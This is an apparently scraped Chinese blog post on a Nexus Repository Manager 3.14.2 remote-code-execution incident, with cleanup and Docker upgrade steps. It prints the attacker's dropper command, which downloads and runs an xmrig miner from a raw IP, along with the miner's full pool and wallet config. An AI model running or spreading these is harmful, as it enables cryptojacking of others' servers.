2. 程式人生 > >Sonatype Nexus Repository Manager版本3.14.2訪問控制缺失及遠程代碼執行漏洞

Sonatype Nexus Repository Manager版本3.14.2訪問控制缺失及遠程代碼執行漏洞

阿新 發佈:2019-03-15
class trie repo 新版 chm access tex ali live

發現被執行的程序在xmrig在 /var/tmp/目錄下 

curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &

config.json內容如下:

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token
 
": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 5,
    "donate-level": 1,
    "huge-pages
 
": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 95,
    "pools": [
        {
            "url": "202.144.193.8:80",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            
 
"rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "185.161.70.34:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "202.144.193.110:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "205.185.122.99:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }       
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": {
        "cn": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ],
        "cn-lite": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ],
        "cn-heavy": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ]
    },
    "algo-perf": {
        "cn": 2.0,
        "cn/2": 2.0,
        "cn/msr": 2.0,
        "cn-lite": 2.0,
        "cn-heavy": 2.0
    },
    "calibrate-algo": false,
    "calibrate-algo-time": 10,
    "user-agent": null,
    "syslog": false,
    "watch": false
}

還有一個可 執行的程序

xrmrig,此程序會 導致cpu爆滿

刪除/var/tmp/目錄下的文件,然後把 程序升級 ,用docker安裝的升級如下:

docker pull docker.io/sonatype/nexus3 //會自動拉去最新版本  
docker run -d -p 8081:8081 -p 5000:5000 --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3

Sonatype Nexus Repository Manager版本3.14.2訪問控制缺失及遠程代碼執行漏洞

相關推薦

Sonatype Nexus Repository Manager版本3.14.2訪問控制缺失執行漏洞

class trie repo 新版 chm access tex ali live 發現被執行的程序在xmrig在 /var/tmp/目錄下 curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /

Nexus Repository Manager 3(CVE-2019-7238) 執行漏洞分析和復現

下載鏈接 例子 conf bash 動態 本地 簡單的 article detail 0x00 漏洞背景 Nexus Repository Manager 3是一款軟件倉庫,可以用來存儲和分發Maven,NuGET等軟件源倉庫。其3.14.0及之前版本中,存在一處基於Or

PHPMailer < 5.2.18 執行漏洞(CVE-2016-10033)

com ifconf github cnblogs grep main src avi https PHPMailer < 5.2.18 Remote Code Execution    本文將簡單展示一下PHPMailer遠程代碼執行漏洞(CVE-2016-100

ECShop全系列版本執行漏洞復現

eval 解析變量 width xtra assert attr 執行 assign select 前言 問題發生在user.php的display函數,模版變量可控,導致註入,配合註入可達到遠程代碼執行 漏洞分析 0x01-SQL註入 先看user.php $bac

漏洞預警 | ECShop全系列版本執行高危漏洞

下載 補丁 wid 變量傳遞 分享 c99 漏洞利用 其中 註入 2018年9月1日,阿裏雲態勢感知發布預警,近日利用ECShop全系列版本的遠程代碼執行漏洞進行批量化攻擊量呈上升趨勢。該漏洞利用簡單且危害較大,黑客可通過WEB攻擊直接獲得服務器權限。 漏洞原理 該漏

如何安裝Nexus Repository Manager OSS 3.x,如何搭建管理Maven私服,win10、win7通用安裝詳解,附:錯誤解決方案。

        今天搭建一個Maven私服花了不少功夫,查閱了很多安裝的帖子以及百度了很多錯誤解決方案,然後將所有的帖子精華部分,附上我的經驗來帶給大家一個特別詳細的安裝方案,所以該文章大部分可以說是總結別人帖子。話不多說,開始安裝: 1.下載 &nb

20.Ecshop 2.x/3.x SQL註入/任意執行漏洞(附實戰exp)

list 文件中 使用 arr php文件 滿足 null sig 安全 Ecshop 2.x/3.x SQL註入/任意代碼執行漏洞 影響版本: Ecshop 2.x Ecshop 3.x-3.6.0 漏洞分析: 該漏洞影響ECShop 2.x和3.x版本,

2. 執行漏洞

nsh set think mixed 生成文件 sse add PE .com 代碼執行 當應用在調用一些能將字符轉化為代碼的函數(如PHP中的eval)時, 沒有考慮用戶是否能控制這個字符串,這就會造成代碼執行漏洞。 相關函數 PHP:eval assert

Nexus Repository Manager 3 RCE CVE-2019-7238

tro erer sonatype oca clas requested repo prope ken Nexus Repository Manager 3 RCE CVE-2019-7238 0x00 參考鏈接 https://support.sonatype.com/

[轉] 使用HTTPS在Nexus Repository Manager 3.0上搭建私有Docker倉庫

dha cau target article data- 重新啟動 crt main specified FROM: https://www.hifreud.com/2018/06/06/03-nexus-docker-repository-with-ssl/

2017python windows 客戶端最新版本3.6.2安裝教程

python第一章 下載windows版本的python登錄網址 https://www.python.org/getit/ 點擊下載Download Python 3.6.3第二章 安裝python-3.6.2.exe根據下圖提示操作即可。第三章 驗證python客戶端是否安裝成功主

[Sqlite]-->資料遷移備份--從低版本3.6.2到高版本3.8.6

引子:資料遷移一,使用.dump命令命令幫助提示.dump ?TABLE? ...      Dump the database in an SQL text format                         If TABLE specified, only du

使用 Nexus Repository Manager 搭建私有docker倉庫

地址 reat 倉庫 dmi log sys systemctl 圖例 temp docker pull sonatype/nexus3 2.使用鏡像啟動一個容器: docker run -d --name nexus --restart=always -p 5000:5

macOS: rsync版本3.1.2安裝使用以及其他備份工具

為了可以將macOS系統自帶的低版本rsync升級到最新的3.1.2版,執行下面的命令來下載編譯和安裝:cd ~/Desktop curl -O https://download.samba.org/pub/rsync/src/rsync-3.1.2.tar.gz curl

3-opencv 2.4.9安裝配置

技術 build bsp 安裝 -1 images http 9.png .cn 1- 2- 3- 4- C:\Program Files\opencv\build\x86\vc12\bin 5- 3-opencv 2.4.9安裝及配置

iOS開發環境 - Git教程2.0:添加倉庫

lan -128 new 右上角 服務器 pos 需要 下一步 warn 添加遠程庫 1 - 你已經在本地創建了一個Git倉庫後,又想在GitHub創建一個Git倉庫,並且讓這兩個倉庫進行遠程同步,這樣,GitHub上的倉庫既可以作為備份,又可以讓其他人通過該倉庫來協作,真

Azure 認知服務 (3) 計算機視覺API - 分析圖像,使用C#

iat query med ron oid sage pos png wait   《Windows Azure Platform 系列文章目錄》   在上一節中Azure 認知服務 (2) 計算機視覺API - 分析圖像,筆者介紹了如何使用API測試控制臺進行調試

12.13 Nginx防盜鏈 12.14 Nginx訪問控制 12.15 Nginx解析php相關配置 12.16 Nginx代理

12.13 nginx防盜鏈 12.14 nginx訪問控制 12.15 nginx解析php相關配置 12.16 nginx代理- 12.13 Nginx防盜鏈 - 12.14 Nginx訪問控制 - 12.15 Nginx解析php相關配置 - 12.16 Nginx代理 - 擴展 - 502問題匯總

springmvc-2(rest風格的增刪改查)-(1)

bin ger ash date quest java mail end collect DepartmentDao.java: package com.springmvc.Dao; import java.util.Collection;import java.util.

12.13 Nginx防盜鏈 12.14 Nginx訪問控制 12.15 Nginx解析php相關配

12.13 Nginx防盜鏈 12.1412.13 Nginx防盜鏈 vim /usr/local/nginx/conf/vhost/test.com.conf加入location ~ ^.+.(gif|jpg|png|swf|flv|rar|zip|doc|pdf|gz|bz2|jpeg|bmp|xls)